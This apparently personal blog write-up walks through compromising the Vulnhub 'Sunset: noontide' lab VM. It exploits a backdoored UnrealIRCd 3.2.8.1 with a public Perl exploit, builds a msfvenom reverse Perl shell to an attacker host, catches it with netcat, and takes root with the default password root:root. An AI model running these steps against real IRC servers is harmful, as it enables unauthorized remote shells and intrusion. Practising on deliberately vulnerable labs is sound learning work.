Sunset:noontide | [Vulnhub write-up]
After a long time vulnhub uploads new VMs, two new VM is came from sunset series “noontide” and “Sundown”, pretty easy even in description also mentioned that “Very easy, do not overthink it!”, So lets start with nmap! as usual :)
i found irc port(INTERNET RELAY CHAT), an irc port is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model.
we have irc verison (unreal 3.2.8.1), i looked in searchsploit and i found 3 direct hits.
searchsploit unreal ircd 3.2.8.1
- For metasploit, which is in ruby language.
- For Windows, which can be used for DOS the service.
- Remote Downloader, written in Perl.
Here, we will use third one …. so i copied 13853.pl file into the current directory….And now we have to generate our own payload by msfvenom.
msfvenom -p cmd/unix/reverse_perl LHOST=<attacker_IP> LPORT=4000 -f raw
Copy this payload! , open 13853.pl file in text editor or you can do nano also…You will see there are total 5 payloads written, clear all the payloads except payload 1.
you will see “my $payload1= ‘AB; BLAH! BLAH! BLAH!”………..
The payload you copied earlier just paste it after “ ‘AB; ” and whatever is written earlier just delete it, and paste the copied payload. YOUR SCRIPT SHOULD BE LOOK LIKE THIS!
remeber that, after -e you have to put “\” and in the end of line also, before single quotes (‘ ’).
now just run this perl file and start listen through netcat.
perl 13853.pl <VICTIM’S_IP> 6667 1
Here i use 1 because we want to run payload 1…we have to specify it ….now start netcat also in second terminal..
nc -lvp 4000
Okay! we got shell for get a proper shell, write python command..
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Now! here you will find local.txt easily, by going in /home/server …..but for ROOT?
Here the description will help us to find out how to get root shell!….Discription said “Very easy, do not overthink it!” ….so i try password for root → “root”.
And BOOM!
you wouldn't believe that …i tried so many things Linenum.sh and finding SUID files..xD xD xD…..then i again read discription and thought ….What if i use root:root….then i got it xD xD xD..
By the Way! this VM is easy…. but i didnt know about irc port …so i just google it first and get enough knowledge ..like What is the IRC ? ..Why it is used ?…How we can connect to it? …How we can exploit it?
So, I learned new thing about IRC …its GOOD!
Next! sunset:sundown write-up is in the queue ;)
Until then, *HAPPY HACKING!*
